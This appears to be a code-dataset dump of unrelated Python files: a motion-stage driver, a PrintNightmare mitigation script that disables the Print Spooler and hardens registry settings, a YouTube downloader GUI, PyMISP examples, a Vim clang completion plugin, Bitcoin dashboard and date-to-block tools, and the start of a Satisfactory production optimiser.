self.check_position(pos)
def __set_position(self, pos):
"""
Move stage to a certain position
:param pos: New position
"""
self.parent.write('%dPA%f' % (self.num, pos))
def check_position(self, pos):
'''Check is stage is at expected position'''
if np.isclose(self.position, pos, atol=self.accuracy):
return True
self.log_error('Position accuracy {} is not reached.'
'Expected: {}, measured: {}'.format(self.accuracy, pos, self._position_cached))
return False
@Feat(units='mm/s')
def max_velocity(self):
return float(self.parent.query('%dVU?' % self.num))
@max_velocity.setter
def max_velocity(self, velocity):
self.parent.write('%dVU%f' % (self.num, velocity))
@Feat(units='mm/s**2')
def max_acceleration(self):
return float(self.parent.query('%dAU?' % self.num))
@max_acceleration.setter
def max_acceleration(self, velocity):
self.parent.write('%dAU%f' % (self.num, velocity))
@Feat(units='mm/s')
def velocity(self):
return float(self.parent.query('%dVA?' % self.num))
@velocity.setter
def velocity(self, velocity):
"""
:param velocity: Set the velocity that the axis should use when moving
:return:
"""
self.parent.write('%dVA%f' % (self.num, velocity))
@Feat(units='mm/s**2')
def acceleration(self):
return float(self.parent.query('%dVA?' % self.num))
@acceleration.setter
def acceleration(self, acceleration):
"""
:param acceleration: Set the acceleration that the axis should use when starting
:return:
"""
self.parent.write('%dAC%f' % (self.num, acceleration))
@Feat(units='mm/s')
def actual_velocity(self):
return float(self.parent.query('%dTV' % self.num))
@actual_velocity.setter
def actual_velocity(self, val):
raise NotImplementedError
@Action()
def stop(self):
"""Emergency stop"""
self.parent.write(u'{0:d}ST'.format(self.num))
@Feat(values={True: '1', False: '0'})
def motion_done(self):
while True:
ret = self.parent.query('%dMD?' % self.num)
if ret in ['1','0']:
break
else:
time.sleep(self.wait_time)
return ret
# Not working yet, see https://github.com/hgrecco/lantz/issues/35
# @Feat(values={Q_('encodercount'): 0,
# Q_('motor step'): 1,
# Q_('millimeter'): 2,
# Q_('micrometer'): 3,
# Q_('inches'): 4,
# Q_('milli-inches'): 5,
# Q_('micro-inches'): 6,
# Q_('degree'): 7,
# Q_('gradian'): 8,
# Q_('radian'): 9,
# Q_('milliradian'): 10,
# Q_('microradian'): 11})
def units(self):
ret = int(self.parent.query(u'{}SN?'.format(self.num)))
vals = {0 :'encoder count',
1 :'motor step',
2 :'millimeter',
3 :'micrometer',
4 :'inches',
5 :'milli-inches',
6 :'micro-inches',
7 :'degree',
8 :'gradian',
9 :'radian',
10:'milliradian',
11:'microradian',}
return vals[ret]
# @units.setter
# def units(self, val):
# self.parent.write('%SN%' % (self.num, val))
def _wait_until_done(self):
#wait_time = convert_to('seconds', on_dimensionless='warn')(self.wait_time)
time.sleep(self.wait_time)
while not self.motion_done:
time.sleep(self.wait_time) #wait_time.magnitude)
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test ESP301 driver')
parser.add_argument('-p', '--port', type=str, default='1',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with ESP301.via_usb(port=args.port) as inst:
# inst.initialize() # Initialize the communication with the power meter
# Find the status of all axes:
for axis in inst.axes:
print('Axis {} Position {} is_on {} max_velocity {} velocity {}'.format(axis.num, axis.position,
axis.is_on, axis.max_velocity,
axis.velocity))
``` |
{
"source": "0xIrison/PrinterNightmare-Patcher",
"score": 2
} |
#### File: 0xIrison/PrinterNightmare-Patcher/printnightmare-patcher.py
```python
import platform, winreg, subprocess, os, ctypes
REG_PATH = r'SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
def is_system_vulnerable():
system = (platform.system() + " " + platform.release()).lower()
if system.find("windows") < 0:
print("[+] This system is NOT vulnerable to PrintNightmare")
exit(0)
return False
try:
security_update = subprocess.check_output('powershell.exe Get-Hotfix KB5004954', shell=True).decode("UTF-8")
if security_update.lower().find("hotfixid") >= 0:
print("[+] PrintNightmare Vulnerability Patch: KB5004945 update is already Installed")
print("[+] This system is NOT vulnerable to PrintNightmare")
return False
except:
print("[!] PrintNightmare Vulnerability Patch: KB5004945 update is NOT Installed!")
updating_system()
try:
access_registry_item = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)
registry_key = winreg.OpenKey(access_registry_item, REG_PATH)
access_key_handler = int(registry_key)
winreg.CloseKey(registry_key)
if access_key_handler >= 0:
print("[!] This system is Vulnerable to PrintNightmare")
return True
except FileNotFoundError:
print("[+] PointAndPrint Registry key does NOT exist")
print("[+] This system is NOT vulnerable to PrintNightmare")
return False
def updating_system():
try:
PS_version = int(subprocess.check_output('powershell.exe $PSVersionTable.PSVersion.major', shell=True).decode("UTF-8"))
if PS_version >= 3:
print("[+] Trying to install the patch ...")
try:
subprocess.check_output('powershell.exe Get-WindowsUpdate -Install -KBArticleID "KB5004945"', shell=True).decode("UTF-8")
print("[+] Patch is installed successfully")
except:
print("[-] Powershell could not recognize Get-WindowsUpdate, Patch is NOT installed!")
print("[!] Please install the security update {KB5004945} manually ")
else:
print("[!] Current Powershell Version does not support PSWindowsUpdate, please install the security update {KB5004945} manually")
except:
print("[-] Powershell version could NOT be identified")
print("[!] I could not install the security update {KB5004945}, please install it manually")
def is_spooler_running():
try:
spooler_status = subprocess.check_output('powershell.exe Get-Service -Name Spooler', shell=True).decode("UTF-8")
if spooler_status.lower().find("running") >= 0:
print("[!] Print Spooler service is running")
return True
except:
print("[-] I could not identify if the Print Spooler service is running or not")
return False
def disable_printspooler():
try:
subprocess.check_output('powershell.exe Stop-Service -Name Spooler -Force', shell=True)
print("[+] The Print Spooler service is stopped")
except:
print("[-] The Print Spooler service cannot be stopped on this computer")
try:
subprocess.check_output('powershell.exe Set-Service -Name Spooler -StartupType Disabled', shell=True)
print("[+] The Print Spooler service is disabled on startup")
except:
print("[-] Something went wrong, I could not disable the service on startup")
def get_printer_reg(NoWarning,UpdatePromptSettings,RestrictDriver):
values = []
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_PATH, 0, winreg.KEY_READ)
value1, regtype = winreg.QueryValueEx(registry_key, NoWarning)
value2, regtype = winreg.QueryValueEx(registry_key, UpdatePromptSettings)
value3, regtype = winreg.QueryValueEx(registry_key, RestrictDriver)
values.append(value1)
values.append(value2)
values.append(value3)
winreg.CloseKey(registry_key)
return values
def set_printer_reg():
try:
values = get_printer_reg("NoWarningNoElevationOnInstall", "UpdatePromptSettings","RestrictDriverInstallationToAdministrators")
NoWarning= int(values[0])
UpdatePromptSettings= int(values[1])
RestrictDriver = int(values[2])
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_PATH, 0, winreg.KEY_WRITE)
if NoWarning == 1:
winreg.SetValueEx(registry_key,"NoWarningNoElevationOnInstall", 0 ,winreg.REG_SZ, "0")
if UpdatePromptSettings == 1:
winreg.SetValueEx(registry_key, "UpdatePromptSettings", 0, winreg.REG_SZ, "0")
if RestrictDriver == 0:
winreg.SetValueEx(registry_key, "RestrictDriverInstallationToAdministrators", 0, winreg.REG_SZ, "1")
winreg.CloseKey(registry_key)
print("[+] Registry key has been updated successfully")
except:
print("[-] Something went wrong, I could not check the registry key")
def check_admin_priv():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
def banner():
print('''
___ _ _ _ _ _ _ _
| . \ _ _ <_>._ _ _| |_ | \ |<_> ___ | |_ _| |_ ._ _ _ ___ _ _ ___
| _/| '_>| || ' | | | | || |/ . || . | | | | ' ' |<_> || '_>/ ._>
|_| |_| |_||_|_| |_| |_\_||_|\_. ||_|_| |_| |_|_|_|<___||_| \___.
<___'
___ _ _
| . \ ___ _| |_ ___ | |_ ___ _ _
| _/<_> | | | / | '| . |/ ._>| '_>
|_| <___| |_| \_|_.|_|_|\___.|_|
==========================
PrintNightmare Patcher v1.0
Author: irison
GitHub: https://github.com/0xirison
*._.* __ _ ._
|[ |_) (_)[ )
==========================
''')
if __name__ == '__main__':
banner()
amiadmin = check_admin_priv()
if not amiadmin:
print("[-] Please run the script with elevated privileges")
exit(0)
is_vulnerable = is_system_vulnerable()
is_spooler_running = is_spooler_running()
if is_spooler_running:
disable_printspooler()
if is_vulnerable or is_spooler_running:
set_printer_reg()
``` |
{
"source": "0xIrison/YouTube-Downloader",
"score": 2
} |
#### File: 0xIrison/YouTube-Downloader/youtube-downloader.py
```python
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *
from PyQt6.QtCore import *
from PyQt6.uic import loadUiType
import os
from os import path
from os.path import expanduser
import sys
import pafy
import math
import urllib.request
#import UI File
FORM_CLASS ,_ = loadUiType(path.join(path.dirname(__file__),"main.ui"))
#Initiate UI File
class MainApp(QMainWindow, FORM_CLASS):
def __init__(self,parent=None):
super(MainApp,self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.handle_UI()
self.handle_Buttons()
self.handle_Actions()
self.setWindowIcon(QIcon('icons/youtube.png'))
def handle_UI(self):
self.setFixedSize(741,548)
def handle_Buttons(self):
self.pushButton.clicked.connect(self.Directory_Browse)
self.pushButton_2.clicked.connect(self.Download_Youtube_Video)
self.pushButton_3.clicked.connect(self.Get_Video_Info)
def handle_Actions(self):
self.actionExit.triggered.connect(self.action_exit)
self.actionAbout.triggered.connect(self.action_about)
def action_exit(self):
QApplication.exit()
def action_about(self):
msg = '''
YouTube Downloader v1.0
==========================
Author: irison
GitHub: https://github.com/0xirison
*._.* __ _ ._
|[ |_) (_)[ )
==========================
This tool is built by Python 3.6, it is used for downloading YouTube videos
Enjoy!
'''
QMessageBox.information(self, "About the Application", msg)
def Directory_Browse(self):
dir_path = QFileDialog.getExistingDirectory(self, "Select Download Directory", expanduser("~/Desktop"))
self.lineEdit_2.setText(dir_path)
def convert_size(self, size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return '{} {}'.format(s , size_name[i])
def Get_Video_Info(self):
self.comboBox.clear()
url_link = self.lineEdit.text()
try:
video = pafy.new(url_link)
except:
QMessageBox.warning(self, "URL is invalid", "Please insert a valid YouTube video link")
self.lineEdit.setText('')
return
st = video.videostreams
if str(st).find("mp4") < 0:
for i in st:
data = '{} {} {}'.format(i.resolution, i.extension, self.convert_size(i.get_filesize()))
self.comboBox.addItem(data)
else:
for video in st:
if video.extension == "mp4":
vide_reso = video.resolution.split("x")[1] + "p"
data = '{} - {} - {}'.format(vide_reso, video.extension.upper(), self.convert_size(video.get_filesize()))
self.comboBox.addItem(data)
count = self.comboBox.count()-1
self.comboBox.setCurrentIndex(count)
QApplication.processEvents()
link = self.lineEdit.text()
yt = pafy.new(link)
url_image = yt.thumb
image = QImage()
image.loadFromData(urllib.request.urlopen(url_image).read())
self.label_2.setScaledContents(1)
self.label_2.setPixmap(QPixmap(image))
self.label.setText(yt.title)
def change_Filename(self, file_dir, filename, extension= '.mp4'):
os.chdir(file_dir)
counter = 1
original_name = filename + '' + extension
file_fullname = original_name
while os.path.isfile(file_fullname):
file_fullname = str(filename + '({})'.format(counter)) + extension
counter += 1
os.rename(original_name+".temp", file_fullname)
def Download_Youtube_Video(self):
if not os.path.isdir(self.lineEdit_2.text()):
QMessageBox.warning(self, "Directory Path is Invalid", "Please select a valid directory path")
self.lineEdit_2.setText('')
return
video_link = self.lineEdit.text()
dir_path = self.lineEdit_2.text()
try:
video = pafy.new(video_link)
except:
QMessageBox.warning(self, "URL is invalid", "Please insert a valid YouTube video link")
self.lineEdit.setText('')
return
st = video.videostreams
quality = self.comboBox.currentIndex()
ext = str(self.comboBox.currentText()).lower()
extension = ""
media_list = ['ogg', 'm4a', 'mp4', 'flv', 'webm', '3gp']
for media_type in media_list:
if ext.find(media_type) >= 0:
extension = media_type
try:
st[quality].download(filepath=dir_path, callback=self.handle_Progressbar)
except FileExistsError:
extension = '.' + extension
self.change_Filename(dir_path,video.title, extension)
QApplication.processEvents()
except Exception as e:
QMessageBox.critical(self, "Download Failed", "Something went wrong, please try again..")
print(e)
self.cleanUp()
def cleanUp(self):
self.label.setText('Youtube Video Title')
self.comboBox.clear()
self.label_2.clear()
self.lineEdit_2.setText('')
self.progressBar.setValue(0)
self.lineEdit.setText('')
def handle_Progressbar(self, total, recvd, ratio, rate, eta):
self.progressBar.setValue(ratio * 100)
if ratio * 100 == 100.00:
QMessageBox.information(self, "File Status", "Download Finished")
self.progressBar.setValue(0)
QApplication.processEvents()
def main():
app = QApplication(sys.argv)
window = MainApp()
window.show()
app.exec()
if __name__ == "__main__":
main()
``` |
{
"source": "0xiso/PyMISP",
"score": 3
} |
#### File: PyMISP/examples/del.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key,misp_verifycert
import argparse
# Usage for pipe masters: ./last.py -l 5h | jq .
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json', debug=True)
def del_event(m, eventid):
result = m.delete_event(eventid)
print(result)
def del_attr(m, attrid):
result = m.delete_attribute(attrid)
print(result)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Delete an event from a MISP instance.')
parser.add_argument("-e", "--event", help="Event ID to delete.")
parser.add_argument("-a", "--attribute", help="Attribute ID to delete.")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.event:
del_event(misp, args.event)
else:
del_attr(misp, args.attribute)
```
#### File: PyMISP/examples/edit_user_json.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key
import argparse
# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one
try:
input = raw_input
except NameError:
pass
def init(url, key):
return PyMISP(url, key, True, 'json')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Edit the user designed by the user_id. If no file is provided, returns a json listing all the fields used to describe a user.')
parser.add_argument("-i", "--user_id", required=True, help="The name of the json file describing the user you want to modify.")
parser.add_argument("-f", "--json_file", help="The name of the json file describing your modifications.")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.json_file is None:
print (misp.get_edit_user_fields_list(args.user_id))
else:
print(misp.edit_user_json(args.json_file, args.user_id))
```
#### File: PyMISP/examples/last.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
import os
import json
# Usage for pipe masters: ./last.py -l 5h | jq .
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json')
def download_last(m, last, out=None):
result = m.download_last(last)
if out is None:
if 'response' in result:
print(json.dumps(result['response']))
else:
print('No results for that time period')
exit(0)
else:
with open(out, 'w') as f:
f.write(json.dumps(result['response']))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Download latest events from a MISP instance.')
parser.add_argument("-l", "--last", required=True, help="can be defined in days, hours, minutes (for example 5d or 12h or 30m).")
parser.add_argument("-o", "--output", help="Output file")
args = parser.parse_args()
if args.output is not None and os.path.exists(args.output):
print('Output file already exists, abord.')
exit(0)
misp = init(misp_url, misp_key)
download_last(misp, args.last, args.output)
``` |
{
"source": "0xItx/deoplete-clangx",
"score": 2
} |
#### File: deoplete/source/clangx.py
```python
import re
import os.path
from os.path import expanduser, expandvars, dirname, isabs, isfile, join
from pathlib import Path
import subprocess
import shlex
from itertools import chain
from deoplete.util import getlines, error
from .base import Base
# vim filetype -----> clang -x `language`
lang_for_ft = {
'c': 'c',
'cpp': 'c++',
'objc': 'objective-c',
'objcpp': 'objective-c++',
}
class Source(Base):
run_dir = ''
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'clangx'
self.filetypes = ['c', 'cpp', 'objc', 'objcpp']
self.mark = '[clangx]'
self.rank = 500
self.executable_clang = self.vim.call('executable', 'clang')
self.encoding = self.vim.eval('&encoding')
self.input_pattern = r'\.[a-zA-Z0-9_?!]*|[a-zA-Z]\w*::\w*|->\w*'
self.vars = {
'clang_binary': 'clang',
'default_c_options': '',
'default_cpp_options': '',
'clang_file_path': ['.clang', '.clang_complete'],
}
self._args = []
def on_event(self, context):
self._args = self._args_from_neoinclude(context)
self.run_dir = context['cwd']
clang = self._args_from_clang(context,
self.get_var('clang_file_path'))
if clang:
self._args += clang
else:
self._args += (self.get_var('default_cpp_options')
if context['filetype'] in ('cpp', 'objcpp')
else self.get_var('default_c_options'))
def get_complete_position(self, context):
m = re.search('[a-zA-Z0-9_]*$', context['input'])
return m.start() if m else -1
def gather_candidates(self, context):
if not self.executable_clang:
return []
if not self.run_dir:
self.run_dir = context['cwd']
line = context['position'][1]
column = context['complete_position'] + 1
lang = lang_for_ft.get(context['filetype'], 'c')
buf = '\n'.join(getlines(self.vim)).encode(self.encoding)
args = [
self.get_var('clang_binary'),
'-x', lang, '-fsyntax-only',
'-Xclang', '-code-completion-macros',
'-Xclang', '-code-completion-at=-:{}:{}'.format(line, column),
'-',
'-I', os.path.dirname(context['bufpath']),
]
args += self._args
try:
proc = subprocess.Popen(args=args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
cwd=self.run_dir)
result, errs = proc.communicate(buf, timeout=10)
result = result.decode(self.encoding)
except subprocess.TimeoutExpired as e:
proc.kill()
return []
return self._parse_lines(result.splitlines())
def _args_from_neoinclude(self, context):
if not self.vim.call(
'exists', '*neoinclude#get_path'):
return []
# Make cache
self.vim.call('neoinclude#include#get_include_files')
return list(chain.from_iterable(
[['-I', x] for x in
self.vim.call('neoinclude#get_path',
context['bufnr'],
context['filetype']).replace(';', ',').split(',')
if x != '']))
def _find_clang_file(self, context, names):
cwd = Path(context['cwd'])
dirs = [cwd.resolve()] + list(cwd.parents)
for d in dirs:
d = str(d)
for name in names:
if isabs(name):
if isfile(name):
return name, dirname(name)
else:
clang_file = join(d, name)
if isfile(clang_file):
return clang_file, d
return [], self.run_dir
def _args_from_clang(self, context, names):
clang_file, self.run_dir = self._find_clang_file(context, names)
if not clang_file:
return []
try:
with open(clang_file) as f:
args = shlex.split(' '.join(f.readlines()))
args = [expanduser(expandvars(p)) for p in args]
return args
except Exception as e:
error(self.vim, 'Parse Failed: ' + clang_file)
return []
def _parse_lines(self, lines):
candidates = []
for line in lines:
m = re.search('^COMPLETION:\s+(.{,}?) : (.{,}?)$', line)
if not m:
m = re.search('^COMPLETION:\s+(.*)$', line)
if m:
candidates.append({'word': m.group(1)})
continue
menu = m.group(2)
menu = menu.replace('[#', '')
menu = menu.replace('#]', ' ')
menu = menu.replace('<#', '')
menu = menu.replace('#>', '')
menu = menu.replace('{#', '')
menu = menu.replace('#}', '')
word = m.group(1)
if word.startswith('PFNG'):
continue
candidate = {'word': word, 'dup': 1}
if menu != word:
candidate['menu'] = menu
candidate['info'] = menu
candidates.append(candidate)
return candidates
``` |
{
"source": "0xJacky/Tan",
"score": 3
} |
#### File: 0xJacky/Tan/report.py
```python
import os
import time
import xlsxwriter
from db import Database
db = Database()
ABS_PATH = os.path.split(os.path.realpath(__file__))[0]
REPORT_PATH = os.path.join(ABS_PATH, 'report-%s.xlsx' % time.strftime("%Y-%m-%d"))
def get_tasks():
sql = 'SELECT * FROM %s_task' % db.sql_prefix
print(sql)
return db.fetchall(sql)
def get_students_list():
sql = "SELECT `name` FROM `%s_students`" % db.sql_prefix
print(sql)
list = []
for i in db.fetchall(sql):
list = list + [i['name']]
return list
def query_clock_in_list(date):
sql = "SELECT s.`name` FROM (%s_task as t INNER JOIN %s_log as l ON t.`ID` = l.`task_id`) \
INNER JOIN %s_students as s ON s.`ID` = l.`student_id` WHERE t.`date`='%s'" % (db.sql_prefix, db.sql_prefix, db.sql_prefix, date)
print(sql)
list = []
for i in db.fetchall(sql):
list = list + [i['name']]
return list
# 定义 excel 操作句柄
o = xlsxwriter.Workbook(REPORT_PATH)
e = o.add_worksheet(u'打卡统计')
workfomat = o.add_format({
'align' : 'center',
'valign' : 'vcenter'
})
# (0,0)
e.write(0, 0, u'姓名', workfomat)
# (x,0)
index = 1
students = get_students_list()
for s in students:
e.write(index, 0, s, workfomat)
index += 1
# (x,y)(x=>1,y=>0)
col_index = 1
for t in get_tasks():
e.write(0, col_index, str(t['date']), workfomat)
e.set_column(0, index, 10)
list = query_clock_in_list(t['date'])
index = 1
for i in students:
status = '√' if i in list else 'x'
e.write(index, col_index, status, workfomat)
index += 1
col_index += 1
# 关闭 & 保存
o.close()
``` |
{
"source": "0xjacobb/bitcoinstatistics",
"score": 3
} |
#### File: 0xjacobb/bitcoinstatistics/app.py
```python
import os
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
import dash_daq as daq
import pandas as pd
from dash.dependencies import Input, Output
# reading data for statistic table
df = pd.read_csv('data.csv')
app = dash.Dash(__name__)
# needed because of Heroku deployement https://github.com/plotly/dash-daq/issues/25
app.scripts.config.serve_locally = True
colors = {
'background': '#323232',
'background_dark': '#1e1e1e',
'text': '#FFFFFF'
}
server = app.server
app.layout = html.Div([
html.Div([
html.H1('BITCOIN HEATMETER'),
], className='row', style={'textAlign': 'center'}),
html.Div([
html.Label('How interesting is Bitcoin to the world?'),
], style={'textAlign': 'center'}),
dcc.Interval(
id='interval-component',
interval=1*10000, # in milliseconds
n_intervals=0
),
# https://dash.plot.ly/dash-daq/gauge
html.Div([
daq.Gauge(
id='bitcoin-gauge-chart',
value=2,
max=10,
min=0,
units="MPH",
color={"gradient": True, "ranges": {
"green": [0, 6], "yellow": [6, 8], "red": [8, 10]}},
)
], className='row', style={'textAlign': 'center'}),
html.Div([
html.Label('24h interest since 2019-04-01'),
], className='row', style={'textAlign': 'center'}),
html.Div([
dash_table.DataTable(
id='table',
columns=[{"name": i, "id": i} for i in df.columns],
data=df.to_dict("rows"),
style_header={
'backgroundColor': colors['background_dark'],
'fontWeight': 'bold'
},
style_cell={
'backgroundColor': colors['background'],
'color': 'white',
'minWidth': '30px', 'width': '50px', 'maxWidth': '90px'
},
style_cell_conditional=[
{
'if': {'column_id': c},
'textAlign': 'center'
} for c in df.columns
],
)
], className='row four columns offset-by-four'),
html.Div([
html.Label('Donate: BTC address'),
html.Img(
src='/assets/qrcode.png',
style={'width': '120px'}
)
], className='row', style={'textAlign': 'center'}),
], style={'backgroundColor': colors['background'], 'color': colors['text']})
# takes value from id='test_input' and return the value in value of id='bitcoin-gauge-chart'
@app.callback([
Output('bitcoin-gauge-chart', 'value'),
Output('bitcoin-gauge-chart', 'max'),
Output('bitcoin-gauge-chart', 'color'),
], [Input('interval-component', 'n_intervals'), ]
)
def update_gauge(n_intervals):
max = 100
min = 0
value = 50
print("TWEETS: ", value)
threshold_1 = max-round(max*0.6)
threshold_2 = max-round(max*0.3)
color = {"gradient": True, "ranges": {
"green": [min, threshold_1], "yellow": [threshold_1, threshold_2], "red": [threshold_2, max]}}
return value, max, color
if __name__ == '__main__':
app.run_server(debug=True)
``` |
{
"source": "0xjacobb/DateToBitcoinBlockConverter",
"score": 3
} |
#### File: 0xjacobb/DateToBitcoinBlockConverter/app.py
```python
from flask import Flask, render_template, request
import datetime
import converter
import sys
app = Flask(__name__)
@app.route("/")
@app.route("/index")
def index():
now = datetime.datetime.now()
return render_template("index.html",
date = now.date(),
time = '%s:%s' % (now.hour, now.minute),
timezone = '0')
@app.route("/result", methods=["POST"])
def result():
data = request.form
try:
datetime_to_block = converter.DateConverter()
if datetime_to_block:
user_input_datetime = datetime_to_block.get_datetime(data)
user_input_datetime_UTC = datetime_to_block.get_datetime_UTC(data)
unix_datetime = int(datetime_to_block.get_unix_datetime(data))
block_height = datetime_to_block.get_corresponding_block(unix_datetime)
latest_update = datetime_to_block.get_latest_block_time_CSV()
link_mainblock = 'https://www.blockchain.com/btc/block/'+ block_height
link_next_block = 'https://www.blockchain.com/btc/block/'+ str(int(block_height) + 1)
return render_template("result.html",
latest_update = latest_update,
user_input_datetime = user_input_datetime,
user_input_datetime_UTC = user_input_datetime_UTC,
unix_datetime = unix_datetime,
block_height = block_height,
link_mainblock = link_mainblock,
link_next_block = link_next_block)
except ValueError:
return render_template("index.html",
date = data.get('date'),
time = data.get('time'),
timezone = data.get('timezone'),
type_time = data.get('type_time'),
error = "Please provide values in correct format")
if __name__ == "__main__":
app.run()
```
#### File: 0xjacobb/DateToBitcoinBlockConverter/converter.py
```python
import datetime
from datetime import timedelta
from pytz import timezone
from pytz import UTC
import pytz
import csv
class DateConverter():
'''
DateConverter
Class for convert a UTC time into nearest Bitcoin block number
'''
# Constructor
def __init__(self):
print("Converter started")
def get_datetime(self, data):
''' check conventions of input datetime from user
data: the key/value pairs from HTML post form
return: checked datetime object in right format or FALSE
'''
year, month, day = data.get('date').split('-')
hours, minutes = data.get('time').split(':')
# https://docs.python.org/3/library/datetime.html#datetime.datetime
dt = datetime.datetime(int(year),int(month),int(day),int(hours),int(minutes))
return dt
def get_datetime_UTC(self, data):
dt = self.get_datetime(data)
timeshift = 0
if data.get("type_time") == '1':
timeshift = int(data.get("timezone")) + 1
else:
timeshift = int(data.get("timezone"))
naive_normalized_dt = dt + timedelta(hours=-int(timeshift))
# make UTC-UNIX timestamp element
# https://medium.com/swlh/making-sense-of-timezones-in-python-16d8ae210c1c
# Treat this time as being in the UTC timezone
aware_normalized_dt = timezone('UTC').localize(naive_normalized_dt)
return aware_normalized_dt
def get_unix_datetime(self, data):
''' convert input datetime to unix, which is the same format as Bitcoin block time
data: the key/value pairs from HTML post form
return: unix timestamp
'''
# Convert to UTC Time
dt_UTC = self.get_datetime_UTC(data)
# Convert to UNIX Time
udt = dt_UTC.timestamp()
if udt:
return udt
else:
return False
def get_corresponding_block(self, unix_datetime):
''' give back the closest block to the UTC datatime from user '''
# Example [block_height, time_stamp]: # 1469,1232752933 # 1470,1232753217
data = list(csv.reader(open('block-data.csv')))[1:]
result = min(data, key=lambda x:abs(int(x[-1])-unix_datetime))
return result[0]
def get_backconvertet_datetime(self, unix_datetime):
''' give back the local machine time based on UNIX'''
return datetime.datetime.fromtimestamp(unix_datetime)
def get_actual_unix_timestamp(self):
return None
def get_latest_block_time_CSV(self):
all_lines = list(csv.reader(open('block-data.csv')))[1:]
last_line = all_lines[-1]
latest_update = self.get_backconvertet_datetime(int(last_line[1]))
return latest_update
if __name__ == "__main__":
date_time_object = DateConverter()
date_time_object.get_corresponding_block(1232753076)
``` |
{
"source": "0xjc/SatisfactoryLP",
"score": 3
} |
#### File: 0xjc/SatisfactoryLP/SatisfactoryLP.py
```python
import scipy.optimize
import json
import numpy as np
import re
import sys
import math
import argparse
from collections import defaultdict
from pprint import pprint
def float_list(s):
return [float(x) for x in s.split(",")] if s else []
parser = argparse.ArgumentParser()
parser.add_argument("--transport-power-cost", type=float, default=50.0,
help="added power cost for transport per conveyor/pipeline of mined resource")
parser.add_argument("--drone-battery-cost", type=float, default=0.5,
help="added battery cost for drone transport per conveyor/pipeline of mined resource")
parser.add_argument("--machine-penalty", type=float, default=2000.0,
help="objective penalty per machine built")
parser.add_argument("--conveyor-penalty", type=float, default=0.0,
help="objective penalty per conveyor belt needed")
parser.add_argument("--pipeline-penalty", type=float, default=0.0,
help="objective penalty per pipeline needed")
parser.add_argument("--power-shard-penalty-ratio", type=float, default=0.6,
help="objective penalty per power shard used, specified as ratio of machine penalty")
parser.add_argument("--extra-miner-clocks", type=float_list, default=[],
help="extra clock choices for miners, specified as decimals")
parser.add_argument("--extra-manufacturer-clocks", type=float_list, default=[0.25, 0.5, 0.75],
help="extra clock choices for manufacturers, specified as decimals")
parser.add_argument("--allow-waste", action="store_true",
help="allow accumulation of nuclear waste and other unsinkable items")
parser.add_argument("--show-unused", action="store_true",
help="show unused LP columns (coeff 0) in the optimization result")
parser.add_argument("--xlsx-report", type=str, default="Report.xlsx",
help="path to xlsx report output")
parser.add_argument("--xlsx-sheet-suffix", type=str, default="",
help="suffix to add to xlsx sheet names")
args = parser.parse_args()
### Constants ###
# Common
STACK_SIZES = {
"SS_HUGE": 500,
"SS_BIG": 200,
"SS_MEDIUM": 100,
"SS_SMALL": 50,
"SS_ONE": 1,
"SS_FLUID": 50000,
}
MACHINE_POWER_SHARD_LIMIT = 3
EPSILON = 1e-9
# Logistics
CONVEYOR_BELT_CLASS = "Build_ConveyorBeltMk5_C"
PIPELINE_CLASS = "Build_PipelineMK2_C"
# Resource extraction
MINER_CLASS = "Build_MinerMk3_C"
OIL_EXTRACTOR_CLASS = "Build_OilPump_C"
WATER_EXTRACTOR_CLASS = "Build_WaterPump_C"
RESOURCE_WELL_EXTRACTOR_CLASS = "Build_FrackingExtractor_C"
RESOURCE_WELL_PRESSURIZER_CLASS = "Build_FrackingSmasher_C"
# Sink
SINK_CLASS = "Build_ResourceSink_C"
# Water
WATER_CLASS = "Desc_Water_C"
# Nuclear power
NUCLEAR_WASTE_MAPPINGS = {
"Desc_NuclearFuelRod_C": "Desc_NuclearWaste_C",
"Desc_PlutoniumFuelRod_C": "Desc_PlutoniumWaste_C",
}
# Geothermal power
GEOTHERMAL_GENERATOR_CLASS = "Build_GeneratorGeoThermal_C"
GEYSER_CLASS = "Desc_Geyser_C"
# Resource map
PURITY_MULTIPLIERS = {
"impure": 0.5,
"normal": 1.0,
"pure": 2.0,
}
POWER_SLUG_SHARDS = {
"greenSlugs": 1,
"yellowSlugs": 2,
"purpleSlugs": 5,
}
RESOURCE_MAPPINGS = {
"Desc_LiquidOilWell_C": "Desc_LiquidOil_C",
"Desc_SAM_C": None, # exclude
}
# Miscellaneous
BIOMASS_GENERATOR_CLASS = "Build_GeneratorBiomass_C"
BATTERY_CLASS = "Desc_Battery_C"
ADDITIONAL_ITEMS = {
"Desc_PlutoniumWaste_C": {
"class": "Desc_PlutoniumWaste_C",
"display_name": "Plutonium Waste",
"form": "RF_SOLID",
"points": 0,
"stack_size": STACK_SIZES["SS_HUGE"],
"energy": 0.0,
},
}
ADDITIONAL_DISPLAY_NAMES = {
GEYSER_CLASS: "Geyser",
}
docs_path = r"Docs.json"
map_info_path = r"MapInfo.json"
